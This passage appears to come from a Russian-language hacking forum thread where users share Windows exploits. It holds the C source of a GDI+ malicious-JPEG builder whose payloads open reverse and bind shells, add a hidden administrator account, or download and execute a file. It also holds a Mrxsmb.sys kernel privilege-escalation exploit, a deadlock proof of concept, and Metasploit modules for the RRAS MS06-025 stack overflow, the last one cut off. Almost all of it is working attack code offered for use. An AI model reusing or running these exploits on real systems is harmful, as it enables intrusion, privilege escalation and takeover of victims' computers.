"\x2A\x76\xB0\xC2\x37\x01\x95\xAD\x81\xB6\x1C\x6A\xA2\x38\xD9\xAE"
"\xCA\x59\x18\x75\x25\xFF\x00\x81\xAE\xD8\xE8\xBB\x47\x62\xAC\xB7"
"\xB6\xA1\x8D\x40\xE3\x86\x65\x6D\x1E\xDB\x89\x2F\x9D\xCD\x6B\x24"
"\x62\x41\x61\x89\xAC\x2D\x8B\x3E\xB6\x68\xC0\x63\x73\x70\x6B\x6B"
"\x6A\xA1\x7A\xAC\x56\xE7\x11\x56\x58\xD4\x13\xA4\x0B\xB6\xEB\xB3"
"\x3B\x47\x22\x95\xD3\x53\x2E\xEA\x19\x86\x96\xF7\x03\x83\x52\x9E"
"\x54\xAB\x6E\x58\x63\x7C\x33\xCE\x93\xB1\x19\x1C\xE9\xDB\xAA\x35"
"\xBF\x46\x8D\xD4\xD2\x56\xE0\xE0\x33\xA1\x4D\x0A\x4E\x3B\xB1\xCD"
"\xD4\x06\x44\x56\x4A\xCD\x24\x26\xEA\x6D\x7A\x87\xDC\x3B\x60\x6D"
"\xFC\x2A\x86\x1B\x97\x36\x6D\x42\x04\xA0\x11\xEE\xE7\x46\x22\x35"
"\xD5\x26\xB0\x1C\x0B\x7C\x69\x5F\x06\xEC\x5A\xC5\x0B\x46\x70\x27"
"\xF2\xD4\x79\xAD\x89\xDA\x30\x74\xBD\x98\xE4\x68\x58\x86\xE4\x1B"
"\x69\xB9\xDC\x2B\x30\x87\x48\x53\xC5\x85\x3B\xDD\x8A\x4E\xB5\x42"
"\xB2\x8C\x6E\x2C\x01\xF8\x56\x04\x7B\xC9\xA3\x05\x4F\xB4\xD5\xA2"
"\xDF\xF6\xFD\xC6\xE2\xA7\x3C\x89\x24\xFE\xA9\x5E\xC3\xD4\x6D\xF7"
"\x85\xC9\x59\x39\x63\x59\x9B\xFF\x00\x06\x1A\x5E\xFA\x69\x0A\x46"
"\x2B\xC0\x9F\xC2\x91\x8B\xC9\x40\x58\x16\xBD\xF2\xC0\xD3\x3B\x7F"
"\x2D\xA9\xBB\x2E\x49\x42\x6D\x52\x70\x39\x62\x9F\x08\x73\x6F\x20"
"\x09\x64\x00\x01\x83\x2B\x00\xD5\x97\xBC\xDC\xF6\x9C\xA7\x66\xEA"
"\xD9\xB6\x9F\xE1\x56\xDE\xBA\xEC\x65\xB4\x44\xD8\xE3\x8D\x52\x2F"
"\x36\xCE\x74\x33\x7E\x9F\x2E\x22\x99\x8B\xC9\x6D\x5A\x6D\x9E\xA8"
"\x22\xC7\x0C\xA8\x62\x3D\x17\x1D\x2F\xC8\xFA\xD4\xB0\x9E\x14\x45"
"\x45\xD5\x6E\x96\x04\xE1\xF1\xA0\x37\x90\x5B\xD8\x7F\x81\x57\x1B"
"\xC8\xD5\x48\x27\x0E\x3C\x6B\x3D\xCD\x44\x15\x92\x41\x25\x94\x82"
"\xAE\x0E\x42\x97\x8D\x8C\x6D\xAE\x56\xB8\x26\xD8\x0F\xE3\x43\x93"
"\x73\x18\x75\x28\xD7\xF8\xD5\xFF\x00\x74\xE4\x18\xC2\x82\xAC\x6F"
"\x86\x7F\x2A\x4C\xBE\xE5\xFC\xD2\x22\xCC\x9A\x32\xD1\x7C\x7D\x68"
;

void show()
{
printf("_____________________________________________________________________\n\n");
printf("                 .:[Sacred Desciples of Doom]:.                      \n");
printf("  GDI+ buffer overrun Exploit, Modified by Crypto <crypto@xaker.ru>  \n");
printf("               Greets to FoToZ who found the bug                     \n");
printf("           These Exploit will build malicious JPG File               \n\n");
printf("_____________________________________________________________________\n\n");


}

void show_usage(char s[255])
{
printf("_____________________________________________________________________\n\n");
printf("                 .:[Sacred Desciples of Doom]:.                      \n");
printf("  GDI+ buffer overrun Exploit, Modified by Crypto <crypto@xaker.ru>  \n");
printf("               Greets to FoToZ who found the bug                     \n");
printf("           These Exploit will build malicious JPG File               \n\n");
printf("_____________________________________________________________________\n\n");
printf("  Usage:                                                              \n");
printf("\t%s 1: For lounching a local cmd.exe (not bound to the net)\n",s);
printf("\t%s 2 [port]: For lounching cmd.exe on defined [port]\n",s);
printf("\t%s 3: For creating a new user account\n",s);
printf("\twith the username=\"ASP32.NET\"\n");
printf("\tand password=\"ASP\"and add it to the local group \"Administrators\"\n");
printf("\t%s 4 [ip] [port]: For making a conection to a defined [ip]\n",s);
printf("\tand on defined [port] and bind cmd.exe on it\n");
printf("\t%s 5 [http]: For downloading and then executing a file\n",s);
exit(1);
}

int main(int argc, char *argv[])
{

FILE *fout;
unsigned int i=0,j=0;
unsigned short port=31337;
unsigned long ip;
WSADATA wsa; 
 


if (argc < 2) { printf("%d",sizeof(shellcode5));
show_usage(argv[0]);
exit(1);
}

//pop up cmd.exe
if (atoi(argv[1]) == 1) 
{
 show();
         mkdir("Crypto");
 fout=fopen("Crypto\\Crypto1.jpg","wb");

  if( !fout ) {
               printf("\t\tErorr:Opening File ...\n");
               exit(1);
}



for(i=0;i<sizeof(shellcode1)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode1[i] ) 
printf("\t\tWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODE\n");


printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode1)-1);

j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
       
for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode1[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

fprintf(fout,"\xFF\xD9");

printf("\t\tOk, Malicious JPG File Created ...\n\n");

fcloseall();
}

//bind cmd.exe on a [port]
if ((atoi(argv[1]) == 2)) 
{
 show();
         mkdir("Crypto");
 fout=fopen("Crypto\\Crypto2.jpg","wb");

  if( !fout ) {
               printf("\t\tErorr:Opening File ...\n");
               exit(1);
}

// lets initialize the socket library, couse we use htons function 
if (WSAStartup(MAKEWORD(1,1),&wsa)==SOCKET_ERROR) {
printf("We got a problem ... Winsock didn't initialize!!\n");
exit(1);
}

port = atoi(argv[2]);
SET_PORTBIND_PORT(shellcode2, htons(port));

for(i=0;i<sizeof(shellcode2)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode2[i] ) 
printf("\t\tWarning: Shellcode Contains FFh D9h, Fix Shellcode\n");

printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode2)-1);

j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
       
for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode2)-1;i++) fputc(shellcode2[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

fprintf(fout,"\xFF\xD9");

printf("\t\tOk, Malicious JPG File Created ...\n\n");

fcloseall();
WSACleanup();
}

//Create User "ASP32.NET"
if (atoi(argv[1]) == 3) 
{
show(); 
mkdir("Crypto");
 fout=fopen("Crypto\\Crypto3.jpg","wb");

  if( !fout ) {
               printf("\t\tErorr:Opening File ...\n");
               exit(1);
}



for(i=0;i<sizeof(shellcode3)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode3[i] ) 
printf("\t\tWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODE\n");


printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode3)-1);

j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
       
for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode3[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

fprintf(fout,"\xFF\xD9");

printf("\t\tOk, Malicious JPG File Created ...\n\n");

fcloseall();
}

//reverse connect back
if (atoi(argv[1]) == 4)
{
 show();
         mkdir("Crypto");
 fout=fopen("Crypto\\Crypto2.jpg","wb");

  if( !fout ) {
               printf("\t\tErorr:Opening File ...\n");
               exit(1);
}

// let's initialize the socket library, couse we use htons function 
if (WSAStartup(MAKEWORD(1,1),&wsa)==SOCKET_ERROR) {
printf("We got a problem ... Winsock didn't initialize!!\n");
exit(1);
}

ip = inet_addr(argv[2]);
port = atoi(argv[3]);
SET_CONNECTBACK_IP(shellcode4, ip);
SET_CONNECTBACK_PORT(shellcode4, htons(port));

for(i=0;i<sizeof(shellcode4)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode4[i] ) 
printf("\t\tWarning: Shellcode Contains FFh D9h, Fix Shellcode\n");

printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode4)-1);

j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
       
for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode2)-1;i++) fputc(shellcode4[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

fprintf(fout,"\xFF\xD9");

printf("\t\tOk, Malicious JPG File Created ...\n\n");

fcloseall();
WSACleanup();
}

if (atoi(argv[1]) == 5) 
{
 show();
         mkdir("Crypto");
 fout=fopen("Crypto\\Crypto5.jpg","wb");

  if( !fout ) {
               printf("\t\tErorr:Opening File ...\n");
               exit(1);
}

strcat(shellcode5,argv[2]);
        strcat(shellcode5,"\x01");


for(i=0;i<sizeof(shellcode5)-1;i++)
if( 0xD9FF == *(unsigned short *)&shellcode5[i] ) 
printf("\t\tWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODE\n");


printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode5)-1);

j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
       
for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout);

for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
j=i;
for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode5[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout);

fprintf(fout,"\xFF\xD9");

printf("\t\tOk, Malicious JPG File Created ...\n\n");

fcloseall();
}

return 0;
}

// You have read till here ? :)
// Well code was not optimized in pourpose, so other's could add some more shellcode's
// with an esy copy+paste :)
// OK some examples here:
//D:\C++\Debug>sacred_jpg.exe 1 [it will pop up cmd.exe]
//D:\C++\Debug>sacred_jpg.exe 2 8081 [it will bind cmd.exe on port 8081]
//D:\C++\Debug>sacred_jpg.exe 3 [it will add user "ASP32.NET" as an administrator]
//D:\C++\Debug>sacred_jpg.exe 4 192.168.0.1 31337
//[it will connest to the 192.168.0.1 on port 31337, of course there listens nc :), nc -l -p 31337]
//D:\C++\Debug>sacred_jpg.exe 5 [url=http://yourserver.com/progam.exe]http://yourserver.com/progam.exe[/url] [it will download and then execute program.exe]
//by the way you can compile source code with VC++ 6.0

Ŧ1LAN · 14.06.2006

Вот парочка сплоитов под винду, может кому надо. +)
MS Windows XP/2K (Mrxsmb.sys) Privilege Escalation PoC (MS06-030)
Эксплоит:

Код:

///////////////////////////////////////////////////////////////////////////////////////
// Mrxsmb.sys XP & 2K Ring0 Exploit (6/12/2005)
// Tested on XP SP2 && 2K SP4 
// Disable ReadOnly Memory protection
// HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\EnforceWriteProtection = 0
// -----------------------------------------------------------------------------------
// ONLY FOR EDUCATIONAL PURPOSES.
// -----------------------------------------------------------------------------------
// Rubén Santamarta.
// www.reversemode.com
// -----------------------------------------------------------------------------------
// OVERVIEW
// -----------------------------------------------------------------------------------
// There are 3 possible values to change in order to adjust the exploit to other versions.
// # XPSP2 (XP Service Pack 2)
// This variable is equal to the File offset of the Call that we are modifying minus 0xC
//. #XPSP2 => 3D88020000                   cmp         eax,000000288
//.           770B                         ja         .000064BBE  --
//.           50                           push        eax
//.           51                           push        ecx
//.           E812E2FFFF                   call       .000062DCC  -- MODIFIED CALL --
// -----------------------------------------------------------------------------------
// #W2KSP4 (Windows 2000 Service Pack 4)
// The same method previosly explained but regarding to Windows 2000 Service Pack 4.
// -----------------------------------------------------------------------------------
// $OffWord
// This variable is defined in CalcJump() Function. 
// E812E2FFFF  call       .000062DCC  -- MODIFIED CALL -- 
// The exploit calculates automatically the relative jump, but we need to provide it
// the 2 bytes following opcode Call(0xE8). In example, as we can see, to test in XP
// OffWord will be equal to 0xE212.
//////////////////////////////////////////////////////////////////////////////////////



#include <windows.h>
#include <stdio.h>


#define XPSP2  0x54BAC  
#define W2KSP4  0x50ADD
#define MAGIC_IOCTL 0x141043

typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*,
        	DWORD ,
        	LPDWORD);

typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase,
        	LPTSTR lpBaseName,
        	DWORD nSize);

VOID ShowError()
{
 LPVOID lpMsgBuf;
 FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
               NULL,
               GetLastError(),
               MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
               (LPTSTR) &lpMsgBuf,
               0,
               NULL);
 MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
 exit(1);
}

DWORD CalcJump(DWORD BaseMRX,BOOL InXP,DWORD *hValue,DWORD *ShellAddr)
{

      DWORD SumTemp;
      DWORD IniAddress;
   DWORD i;
   DWORD sumAux;
   DWORD addTemp;
   DWORD OffWord;
   
   if(InXP)
   {
  SumTemp=BaseMRX+XPSP2+0xE;
     OffWord=0xE212;
   }
   else
   {
     SumTemp=BaseMRX+W2KSP4+0xE;
  OffWord=0xa971;
   }
  
	
   for(i=0x4c;i<0xDDDC;i=i+4)
   {   
  sumAux=~((i*0x10000)+OffWord);
  addTemp=SumTemp-sumAux;
  if(addTemp>0xE000000 && addTemp<0xF000000){
    IniAddress=addTemp&0xFFFFF000;
    *hValue=i-4;
    *ShellAddr=addTemp;
    break;
  }
   }
   printf("\nINFORMATION \n");
   printf("-----------------------------------------------------\n");
      printf("Patched Driver Call pointing to \t [0x%p]\n",addTemp);
   
      return (IniAddress);
} 

int main(int argc, char *argv[])
{
 PENUMDEVICES pEnumDeviceDrivers;
 PGETDEVNAME  pGetDeviceDriverBaseName;
 LPVOID arrMods[200],addEx;
 DWORD cb,i,devNum,dwTemp,hValue,Ring0Addr,junk,ShellAddr,BaseMRX=0;
 DWORD *OutBuff,*InBuff;
 HANDLE hDevice;
 BOOL InXP;
 CHAR baseName[255];

 CONST CHAR Ring0ShellCode[]="\xCC";       //"PUT YOUR RING0 CODE HERE :)"
 
 if(argc<2)
 {
  printf("\nMRXSMB.SYS RING0 Exploit\n");
  printf("--- Ruben Santamarta ---\n");
  printf("Tested on XPSP2 & W2KSP4\n");
  printf("\nusage> exploit.exe <XP> or <2K>\n");
  exit(1);
 }
 
 if(strncmp(argv[1],"XP",2)==0)
  InXP=TRUE;
 else
  InXP=FALSE;

 pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
             "EnumDeviceDrivers");

 pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
             "GetDeviceDriverBaseNameA");

 pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
 devNum=cb/sizeof(LPVOID);
 printf("\nSearching Mrxsmb.sys Base Address...");

 for(i=1;i<=devNum;i++)
 {
       pGetDeviceDriverBaseName(arrMods[i],baseName,254);
    if((strncmp(baseName,"mrxsmb",6)==0))
    {
       printf("[%x] Found!\n",arrMods[i]);
     BaseMRX=(DWORD)arrMods[i];
    }
 }

 if(!BaseMRX)
 {
  printf("Not Found\nExiting\n\n");
  exit(1);
 }

 addEx=(LPVOID)CalcJump(BaseMRX,InXP,&hValue,&ShellAddr);
 OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
 
 if(!OutBuff) ShowError();

 printf("F000h bytes allocated  at \t\t [0x%p]\n",addEx);
 printf("Value needed   \t\t\t  [0x%p]\n",hValue+4);

 InBuff=OutBuff;
 
 printf("Checking Shadow Device...");
 hDevice = CreateFile("\\\\.\\shadow",
                    FILE_EXECUTE,
                    FILE_SHARE_READ|FILE_SHARE_WRITE,
                    NULL,
                    OPEN_EXISTING,
                    0,
                    NULL);
  
 if (hDevice == INVALID_HANDLE_VALUE) ShowError();
 printf("[OK]\n");
 
 printf("Querying Device...\n");

 while(OutBuff[3]< hValue)
  {
  	DeviceIoControl(hDevice,      // "\\.\shadow"
                            MAGIC_IOCTL,  // Privileged IOCTL
                            InBuff, 2,    // InBuffer, InBufferSize
                            OutBuff, 0x18,// OutBuffer,OutBufferSize
                            &junk,        // bytes returned
                            (LPOVERLAPPED) NULL);
  
  printf("\r\t[->]VALUES: (%x)",OutBuff[3]);
  }

  if(InXP)
   Ring0Addr=BaseMRX+XPSP2;
  else
   Ring0Addr=BaseMRX+W2KSP4; 
  
  printf("Overwritting Driver Call at[%x]...",Ring0Addr);
  DeviceIoControl(hDevice,      // "\\.\shadow"
                            MAGIC_IOCTL,  // Privileged IOCTL
                            InBuff, 2,    // InBuffer, InBufferSize
                            (LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x
                            &junk,        // bytes returned
                            (LPOVERLAPPED) NULL);
  
  printf("[OK]\n");
  for(i=1;i<0x3C00;i++) OutBuff[i]=0x90909090;
  
  memcpy((LPVOID*)ShellAddr,(LPVOID*)Ring0ShellCode,sizeof(Ring0ShellCode));
 
  
  printf("Sending IOCTL to execute the ShellCode\n");
  
  DeviceIoControl(hDevice,      // "\\.\shadow"
                            MAGIC_IOCTL,  // Privileged IOCTL
                            InBuff, 2,    // InBuffer, InBufferSize
                            OutBuff, 0x18,// OutBuffer,OutBufferSize
                            &junk,        // bytes returned
                            (LPOVERLAPPED) NULL);

  dwTemp=CloseHandle(hDevice);
  if(!dwTemp) ShowError();

  dwTemp=VirtualFree(OutBuff,0xf000,MEM_DECOMMIT);
  if(!dwTemp) ShowError();

  return(1);
}

====================================================
и второй сплоит:
MS Windows (NtClose DeadLock) Vulnerability PoC (MS06-030)
Эксплоит:

Код:

////////////////////////////////////////////////////////////////////////////////
///////// MRXSMB.SYS NtClose DEADLOCK exploit///////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
//November 19,2005
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
//ONLY FOR EDUCATION PURPOSES
////////////////////////////////////////////////////////////////////////////////
// Rubén Santamarta 
// ruben (at) reversemode (dot) com
// http://www.reversemode.com
////////////////////////////////////////////////////////////////////////////////

#include <windows.h>
#include <stdio.h>


#define MAGIC_IOCTL 0x141047


VOID ShowError()
{
 LPVOID lpMsgBuf;
 FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
               NULL,
               GetLastError(),
               MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
               (LPTSTR) &lpMsgBuf,
               0,
               NULL);
 MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
 exit(1);
}


VOID IamAlive()
{
 DWORD i;
 
 for(i=0;i<0x1000;i++)
 {
  Sleep(1000);
  printf("\rI am a Thread and I am alive [%x]",i);
 } 

}


VOID KillMySelf()
{
     
 DWORD junk;
 DWORD *OutBuff;
 DWORD *InBuff;
 BOOL bResult;
 HANDLE hDevice;
 DWORD i;
 
  hDevice = CreateFile("\\\\.\\shadow", FILE_EXECUTE,FILE_SHARE_READ|FILE_SHARE_WRITE,
                      NULL, OPEN_EXISTING, 0, NULL);
                      
  if (hDevice == INVALID_HANDLE_VALUE) ShowError();
  
  OutBuff=(DWORD*)malloc(0x18);
  if(!OutBuff) ShowError();
  
  OutBuff[3]=(DWORD)hDevice;
  
  DeviceIoControl(hDevice,
                  MAGIC_IOCTL,
                  0,0,
                  OutBuff,0x18,
                  &junk,
                  (LPOVERLAPPED)NULL);
  // MAIN THREAD ENDING.
}


int main(int argc, char *argv[])
{
    
 LPTHREAD_START_ROUTINE GoodThread;
 DWORD dwThreadId;
 DWORD bResult;
 GoodThread=(LPTHREAD_START_ROUTINE)IamAlive;
 

  printf("-=[MRXSMB.SYS NtClose Vulnerability POC]=-\n");
  printf("\t(Only for educational purposes)\n");
  printf("..http://www.reversemode.com..\n\n");
  printf("Launching Thread ...");
  
  // PUT YOUR "GOOD" OR "BAD" CODE HERE
  // e.g GoodThread
  CreateThread(NULL,0,GoodThread,0,0,&dwThreadId);  
  
   
  printf("Done\n");
  printf("I am going to dissapear,but I will be with you forever\n");
  printf("(..)\n\n");
  KillMySelf(); // Immortal mode "on";)
  
  return(1); 
}

not null · 22.06.2006

MS Windows RRAS Remote Stack Overflow Exploit (MS06-025)

Код:

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::rras_ms06_025;
use base "Msf::Exploit";
use strict;

use Pex::DCERPC;
use Pex::NDR;

my $advanced = {
'FragSize'    => [ 256, 'The DCERPC fragment size' ],
'BindEvasion' => [ 0,   'IDS Evasion of the Bind request' ],
'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
  };

my $info = {
'Name'    => 'Microsoft RRAS MSO6-025 Stack Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' => 
[ 
'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>',
'H D Moore <hdm [at] metasploit.com>'
],

'Arch' => ['x86'],
'OS'   => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 1,

'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' => {
'RHOST' => [ 1, 'ADDR', 'The target address' ],

# SMB connection options
'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username',''],
'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
'SMBPIPE' => [ 1, 'DATA', 'The pipe name to use (2000=ROUTER, XP=SRVSVC)', 'ROUTER' ],
  },

'Payload' => {
'Space'    => 1104,
'BadChars' => "\x00",
'Keys'     => ['+ws2ord'],

# sub esp, 4097 + inc esp makes stack happy
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
  },

'Description' => Pex::Text::Freeform(
qq{
        This module exploits a stack overflow in the Windows Routing and Remote
Access Service. Since the service is hosted inside svchost.exe, a failed 
exploit attempt can cause other system services to fail as well. A valid
username and password is required to exploit this flaw on Windows 2000. 
When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
}
  ),

'Refs' =>
  [
[ 'BID', '18325' ],
[ 'CVE', '2006-2370' ],
[ 'OSVDB', '26437' ],
[ 'MSB', 'MS06-025' ]
  ],

'DefaultTarget' => 0,
'Targets'       =>
  [
[ 'Automatic' ],
[ 'Windows 2000',   0x7571c1e4 ], # pop/pop/ret
[ 'Windows XP SP1', 0x7248d4cc ], # pop/pop/ret
  ],

'Keys' => ['rras'],

'DisclosureDate' => 'Jun 13 2006',
  };

sub new {
my ($class) = @_;
my $self    = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
return ($self);
}

sub Exploit {
my ($self)      = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx  = $self->GetVar('TARGET');
my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
my $target      = $self->Targets->[$target_idx];

my $FragSize = $self->GetVar('FragSize') || 256;
my $target   = $self->Targets->[$target_idx];

my ( $res, $rpc );

if ( !$self->InitNops(128) ) {
$self->PrintLine("[*] Failed to initialize the nop module.");
return;
}

my $pipe    = "\\" . $self->GetVar("SMBPIPE");
my $uuid    = '20610036-fa22-11cf-9823-00a0c911e5df';
my $version = '1.0';

my $handle =
  Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host,
$pipe );

my $dce = Pex::DCERPC->new(
'handle'      => $handle,
'username'    => $self->GetVar('SMBUSER'),
'password'    => $self->GetVar('SMBPASS'),
'domain'      => $self->GetVar('SMBDOM'),
'fragsize'    => $self->GetVar('FragSize'),
'bindevasion' => $self->GetVar('BindEvasion'),
'directsmb'   => $self->GetVar('DirectSMB'),
  );

if ( !$dce ) {
$self->PrintLine("[*] Could not bind to $handle");
return;
}

my $smb = $dce->{'_handles'}{$handle}{'connection'};
if ( $target->[0] =~ /Auto/ ) {
if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {
$target = $self->Targets->[1];
$self->PrintLine('[*] Detected a Windows 2000 target...');
}
elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {
$target = $self->Targets->[2];
$self->PrintLine('[*] Detected a Windows XP target...');
}
else {
$self->PrintLine( '[*] No target available : ' . $smb->PeerNativeOS() );
return;
}
}

my $pattern = '';

if ($target->[0] =~ /Windows 2000/) {

$pattern =
  pack( 'V', 1 ) .
  pack( 'V', 0x49 ) .
  $shellcode .
  "\xeb\x06" .
  Pex::Text::AlphaNumText(2).
  pack( 'V', $target->[1] ) .
  "\xe9\xb7\xfb\xff\xff";

} elsif( $target->[0] =~ /Windows XP/) {

$pattern =
  pack( 'V', 1 ) .
  pack( 'V', 0x49 ) .
  Pex::Text::AlphaNumText(0x4c).
  "\xeb\x06" .
  Pex::Text::AlphaNumText(2).
  pack( 'V', $target->[1] ) .
  $shellcode;

} else {
self->PrintLine( '[*] No target available...');
return;
}

# need to produce an exception
my $request = $pattern . Pex::Text::AlphaNumText(0x4000 - length($pattern));

my $len = length ($request);

my $stub =
  Pex::NDR::Long( int( 0x20000 ) )
  . Pex::NDR::Long( int( $len ) )
  . $request
  . Pex::NDR::Long( int( $len ) );

$self->PrintLine("[*] Sending request...");
my @response = $dce->request( $handle, 0x0C, $stub );
if (@response) {
$self->PrintLine('[*] RPC server responded with:');
foreach my $line (@response) {
$self->PrintLine( '[*] ' . $line );
}
$self->PrintLine('[*] This probably means that the system is patched');
}
return;
}

1;

greetzzz: H D Moore

not null · 30.06.2006

Новая версия предыдущего эксплоита для все той же уязвимости

Код:

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::rras_ms06_025_rasman;
use base "Msf::Exploit";
use strict;

use Pex::DCERPC;
use Pex::SMB;
use Pex::NDR;

my $advanced = {
	'FragSize'    => [ 256, 'The DCERPC fragment size' ],
	'BindEvasion' => [ 0,   'IDS Evasion of the Bind request' ],
	'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
  };

my $info = {
	'Name'    => 'Microsoft RRAS MSO6-025 RASMAN Registry Stack Overflow',
	'Version' => '$Revision: 1.1 $',
	'Authors' =>
   [
  'Pusscat <pusscat [at] gmail.com>',
  'H D Moore <hdm [at] metasploit.com>'
   ],

	'Arch' => ['x86'],
	'OS'   => [ 'win32', 'win2000', 'winxp' ],
	'Priv' => 1,

	'AutoOpts' => { 'EXITFUNC' => 'thread' },
	'UserOpts' =>
   {
  'RHOST' => [ 1, 'ADDR', 'The target address' ],

  # SMB connection options
  'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
  'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username',''],
  'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
  'SMBPIPE' => [ 1, 'DATA', 'The pipe name to use (2000=ROUTER, XP=SRVSVC)', 'ROUTER' ],
   },

	'Payload' =>
   {
  'Space'    =>1024,
  'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",

  # sub esp, 4097 + inc esp makes stack happy
  'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
   },

	'Description' => Pex::Text::Freeform(
